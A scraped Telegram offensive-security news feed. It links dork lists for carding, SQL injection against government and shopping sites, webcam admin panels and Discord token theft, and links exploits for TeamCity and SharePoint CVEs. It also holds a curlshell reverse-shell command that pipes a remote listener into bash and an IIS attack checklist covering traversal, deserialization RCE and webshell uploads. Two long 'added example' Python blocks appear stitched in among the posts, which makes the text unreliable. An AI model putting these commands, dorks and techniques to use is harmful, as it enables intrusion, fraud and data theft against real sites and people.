Pentester's Backlog
592 subscribers
313 photos
15 videos
44 files
426 links
A news aggregator from the world of offensive security.

EDUCATIONAL PURPOSES ONLY
Forwarded from C.I.T. Security
Github dorks

https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
https://github.com/Vaidik-pandya/Github_recon_dorks/blob/main/gitdork.txt (for finding files)


Shodan dorks

https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/1-part-100-article/google/Shodan%20Queries.txt
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/


Netlas dorks

https://github.com/netlas-io/netlas-dorks


Censys dorks

https://github.com/thehappydinoa/awesome-censys-queries

Virus Total dorks

https://github.com/Neo23x0/vti-dorks


Binary Edge + Shodan + Google

https://github.com/iGotRootSRC/Dorkers


Google, Bing, Ecosia, Yahoo or Yandex

https://github.com/Zarcolio/sitedorks


Google dorks

https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List


Onion dorks

Dorks for searching .onion sites mirrored by online proxy services https://github.com/cipher387/Dorks-collections-list/blob/main/onion.txt

CCTV dorks

Dorks for finding CCTV camera admin panels https://github.com/cipher387/Dorks-collections-list/blob/main/cctv.txt
Camera dorks from @tru_1veresk https://github.com/iveresk/camera_dorks/blob/main/dorks.json
Google Dorks of Live Webcams, CCTV etc. (from d4msec) https://d4msec.wordpress.com/2015/09/05/google-dorks-of-live-webcams-cctv-etc-google-unsecured-ip-cameras/

Backlink dorks

List https://github.com/alfazzafashion/Backlink-dorks
Explanation https://www.techywebtech.com/2021/08/backlink-dorks.html
1150 dorks for forum hunting https://www.blackhatworld.com/seo/get-backlinks-yourself-1150-dorks-for-forum-hunting.380843/

Token dorks

Discord Bots Tokens https://github.com/traumatism/get-discord-bots-tokens-with-google

Hidden files dorks

Universal for Google, Bing, etc.

https://github.com/0xAbbarhSF/Info-Sec-Dork-List/blob/main/hidden_files_dork.txt

Admin panel dorks


https://github.com/cyberm0n/admin-panel-dorks/blob/main/dorks.txt

SQL injection dorks

SQL injection dorks for government sites https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sql_gov_dorks.txt
SQL injection dorks 2019 https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sqli_dork_2019.txt

Linkedin dorks (Google X-Ray search for Linkedin)

Linkedin X-Ray search queries and tools https://github.com/krlabs/linkedin-dorks

Carding dorks

1170 carding dorks https://pastebin.com/GYXLqgU0
17K carding dorks 2019 https://pastebin.com/fgdZxy74

Gaming dorks

7K Gaming Dorks From My Shop https://pastebin.com/ajuixpY2
Minecraft https://pastebin.com/ssNgdTkC

Shopping dorks

10k Amazon dorks https://pastebin.com/1HrmzFre
820 shopping Dorks for SQLi https://pastebin.com/1kED1FDX

Cryptocurrency dorks
15K dorks to find vulnerable pages related to cryptocurrency exchanges, cryptocurrency payments, etc. https://www.scribd.com/document/384770530/15k-Btc-Dorks

18K Bitcoin and other cryptocurrency related dorks https://pdfcoffee.com/18k-bitcoin-dorks-list--3-pdf-free.html


Bug Bounty Dorks

https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks
https://github.com/Vinod-1122/bug-bounty-dorks/blob/main/Dorks.txt

GIT files Dorks

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt

Log files Dorks

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt

CMS Dorks

Wordpress https://pastebin.com/A9dsmgHQ
Magento https://pastebin.com/k75Y2QhF
Joomla https://pastebin.com/vVQFTzVC

Cloud instance dorks
#pentest #web

ALARM ALARM
Forwarded from Кавычка (Bo0oM)
#bitrix 🚨🚨🚨

A vulnerability in the landing module of the 1C-Bitrix: Site Management content management system (CMS) that allows an attacker to execute OS commands on the vulnerable host, take control of its resources and move into the internal network.

Bitrix > 23.850.0
RCE, CVSS 10/10

Remove the landing module if it is not in use. Update to version 23.850.0 or later if it is.

BDU:2023-05857

So, guys, anime?
waiting for a PoC 😬
#pentest #web

In light of recent events, in case someone is planning to surprise us with new vulnerabilities in Bitrix, here are the sources

https://gitlab.com/alexprowars/bitrix/-/tree/master
Forwarded from Proxy Bar
curlshell
reverse shell using curl
usage:
Start your listener:
./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234

On the remote side:
curl https://curlshell:1234 | bash

download

#shell #curl
#pentest #web

puredns

puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard subdomains and DNS poisoned entries.

It uses massdns, a powerful stub DNS resolver, to perform bulk lookups. With the proper bandwidth and a good list of public resolvers, it can resolve millions of queries in just a few minutes. Unfortunately, the results from massdns are only as good as the answers provided by the public resolvers. The results are often polluted by wrong DNS answers and false positives from wildcard subdomains.

Examples of usage:
puredns resolve domains.txt
puredns bruteforce wordlist.txt domain.com --resolvers public.txt
cat domains.txt | puredns resolve

Github
^ As @RalfHackerChannel once wrote
1) Collect public resolvers with dnsvalidator (dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o resolvers.txt)
2) Take some large wordlist from here
3) Run puredns bruteforce wordlist.txt domain (the tool will pick up the resolvers from the resolvers.txt file automatically)

The result is a superb tool for collecting subdomains!
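The two things that make this pipeline usable, as the puredns description says, are filtering out wildcard subdomains and discarding poisoned answers from public resolvers. Below is an added example, not puredns's own code, that models both steps offline: resolvers are stubbed with constructed zone tables (example.com with a `*.dev.example.com` wildcard, a real host under that wildcard, and a public resolver that invents an answer for a non-existent name), so the script runs without network access.

```python
"""Added example, not puredns's own code: a small offline model of the two
filters the post relies on.  (1) wildcard filtering: a name is dropped when
it only resolves because a parent zone has a wildcard record; (2) validation:
survivors are re-resolved against a trusted resolver so that poisoned answers
from public resolvers are discarded.  Zones and resolvers are constructed
lookup tables, so nothing touches the network."""
import fnmatch
import secrets
from typing import Callable, Dict, FrozenSet, Iterable, Set

Resolver = Callable[[str], FrozenSet[str]]  # hostname -> set of A records


def table_resolver(zone: Dict[str, Set[str]]) -> Resolver:
    """Resolver over a constructed zone. Keys are exact names or '*.parent'
    wildcards; an exact name wins, then the most specific wildcard."""
    def resolve(name: str) -> FrozenSet[str]:
        if name in zone:
            return frozenset(zone[name])
        matches = [p for p in zone if p.startswith("*.") and fnmatch.fnmatchcase(name, p)]
        return frozenset(zone[max(matches, key=len)]) if matches else frozenset()
    return resolve


def wildcard_answers(name: str, resolve: Resolver, probes: int = 2) -> FrozenSet[str]:
    """Answers produced purely by wildcards above `name`: resolve random labels
    under every parent zone (stopping before the TLD) and union the results."""
    labels = name.split(".")
    seen: Set[str] = set()
    for i in range(1, len(labels) - 1):
        parent = ".".join(labels[i:])
        for _ in range(probes):
            seen |= resolve(f"{secrets.token_hex(6)}.{parent}")
    return frozenset(seen)


def filter_wildcards(names: Iterable[str], resolve: Resolver) -> Dict[str, FrozenSet[str]]:
    """Keep names whose answer is not fully explained by a wildcard.  A real
    record under a wildcard zone survives when its address differs."""
    kept: Dict[str, FrozenSet[str]] = {}
    wildcard_cache: Dict[str, FrozenSet[str]] = {}
    for name in names:
        answer = resolve(name)
        if not answer:
            continue
        parent = name.split(".", 1)[1]
        if parent not in wildcard_cache:
            wildcard_cache[parent] = wildcard_answers(name, resolve)
        if answer <= wildcard_cache[parent]:
            continue  # alive only because of the wildcard
        kept[name] = answer
    return kept


def validate(candidates: Dict[str, FrozenSet[str]], trusted: Resolver) -> Dict[str, FrozenSet[str]]:
    """Second pass with a trusted resolver: keep a name only if it still
    resolves, and take the trusted answer rather than the public one."""
    result: Dict[str, FrozenSet[str]] = {}
    for name in candidates:
        answer = trusted(name)
        if answer:
            result[name] = answer
    return result


def bruteforce(wordlist: Iterable[str], domain: str, public: Resolver, trusted: Resolver):
    """The bruteforce pipeline in miniature: wordlist x domain -> bulk resolve
    on public resolvers -> wildcard filter -> trusted validation."""
    names = [f"{word}.{domain}" for word in wordlist]
    return validate(filter_wildcards(names, public), trusted)


# --- constructed sample data (not real hosts) -------------------------------
AUTHORITATIVE = {
    "www.example.com": {"198.51.100.10"},
    "mail.example.com": {"198.51.100.20"},
    "*.dev.example.com": {"203.0.113.5"},     # wildcard: any label under dev resolves
    "api.dev.example.com": {"203.0.113.9"},   # a real host living under the wildcard
}
# A misbehaving public resolver: same zone, plus an answer for a name that does not exist.
POISONED_PUBLIC = {**AUTHORITATIVE, "vpn.example.com": {"192.0.2.66"}}
WORDLIST = ["www", "mail", "vpn", "api.dev", "staging.dev", "nothing"]

if __name__ == "__main__":
    found = bruteforce(WORDLIST, "example.com",
                       public=table_resolver(POISONED_PUBLIC),
                       trusted=table_resolver(AUTHORITATIVE))
    for host, ips in sorted(found.items()):
        print(host, sorted(ips))
```

Of the six candidates, `staging.dev` is dropped because its address is exactly what a random label under `dev.example.com` returns, `api.dev` survives because its address differs from the wildcard answer, and `vpn` survives the wildcard check but dies in validation because the trusted resolver does not know it. Random probe labels (rather than a fixed one like `test`) matter: a fixed label could itself be a real record.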
Forwarded from PT SWARM
🔥 We have reproduced the fresh CVE-2023-42793 in JetBrains TeamCity.

Authentication bypass allows an external attacker to gain administrative access to the server and execute any commands on it.

Update your software ASAP!
#pentest

Playlist of recordings from the recent VolgaCTF 2023

link
Forwarded from SHADOW:Group
💻 What to look for on a site running IIS?

1. Use shortscan to find short (and, where possible, full) file names and extensions.

2. Check for a reverse proxy and try directory traversal:
/backend/ -> 10.0.0.1/api/
/backend/..%2Ftest -> 10.0.0.1/test
You can read more about this here.

3. Once you get file disclosure, look at the keys in web.config and try to get RCE via deserialization. Read about it here.

4. Try uploading .asp, .aspx, .ashx etc. files (full list here)

#web #iis #rce
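The `/backend/..%2Ftest -> 10.0.0.1/test` trick in step 2 works because the proxy and the backend disagree about what the path is: the proxy routes on the raw path (a literal `../` gets collapsed and never leaves the proxy, but `..%2F` is one opaque segment to it), while the backend percent-decodes first and only then resolves the `..`. The following is an added example, not code from the post or from any proxy product, that models both hops and a hardened proxy that canonicalises the same way the backend will before routing. The route table (`/backend/` to `/api/`) is taken from the post's example; everything else is constructed.

```python
"""Added example, not from the original post or any named product: a model of
the path-handling mismatch behind '/backend/..%2Ftest -> 10.0.0.1/test'.
The naive proxy normalises the request path but never percent-decodes it,
while the backend decodes first and then collapses '..' segments, so the two
disagree about where the request goes.  Routes are constructed."""
import posixpath
from urllib.parse import unquote

# proxy prefix -> backend prefix (the post's example: /backend/ is served by 10.0.0.1/api/)
ROUTES = {"/backend/": "/api/"}


def normalize(path: str) -> str:
    """Collapse '.' and '..' segments without escaping above '/', keeping the
    trailing slash that posixpath.normpath would drop."""
    norm = posixpath.normpath(path)
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def route(path: str):
    """Map a canonical proxy path to (backend prefix, backend path), or
    (None, None) when no route matches and the proxy handles it itself."""
    for prefix, target in ROUTES.items():
        if path.startswith(prefix):
            return target, target + path[len(prefix):]
    return None, None


def naive_proxy(path: str):
    """Vulnerable: routes on the raw path.  A literal '../' is collapsed here
    and never reaches the backend, but '..%2F' (or '%2e%2e/') is an ordinary
    segment to the proxy and is forwarded untouched."""
    return route(normalize(path))[1]


def backend_resolve(path: str) -> str:
    """What the backend serves: percent-decode, then resolve dot segments."""
    return normalize(unquote(path))


def hardened_proxy(path: str):
    """Fixed: canonicalise exactly the way the backend will before routing,
    refuse double-encoding and backslashes, and re-check that the forwarded
    path still lies under the backend prefix."""
    decoded = unquote(path)
    if unquote(decoded) != decoded or "\\" in decoded:
        return None
    target, upstream = route(normalize(decoded))
    if upstream is None or not backend_resolve(upstream).startswith(target):
        return None
    return upstream


def trace(path: str):
    """(what the naive proxy forwards, what the backend then serves,
    what the hardened proxy forwards) for one request path."""
    forwarded = naive_proxy(path)
    served = backend_resolve(forwarded) if forwarded else None
    return forwarded, served, hardened_proxy(path)


if __name__ == "__main__":
    for p in ["/backend/users", "/backend/../test", "/backend/..%2Ftest", "/backend/%2e%2e/test"]:
        print(p, "->", trace(p))
```

The interesting row is `/backend/..%2Ftest`: the naive proxy forwards `/api/..%2Ftest`, the backend decodes and serves `/test`, i.e. a path outside the `/api/` tree that the proxy was supposed to expose. The hardened version decodes and normalises before matching, so the same request no longer matches the `/backend/` route at all. When probing, send the encoded forms (`..%2F`, `%2e%2e/`, and double-encoded `%252e%252e%252f`) separately, since each hop may decode a different number of times.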
Not exactly #pentest, but still

Aeza now has a VDS plan on a Stockholm server for 109(!!!) rubles / month.

And you can scan from these servers!
at your own risk, the information is unverified
Forwarded from Волосатый бублик
#web #portswigger #burp #nosql #injection

New topic on Web Security Academy — NoSQL injection

Dive into the world of NoSQL database security with the brand new NoSQL topic - read through the learning materials, then work through the labs to test your knowledge.

https://portswigger.net/web-security/nosql-injection
Forwarded from Proxy Bar
CVE-2023-29357
Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability
affected from 16.0.0 before 16.0.10399.20005
exploit
Have a good weekend, everyone!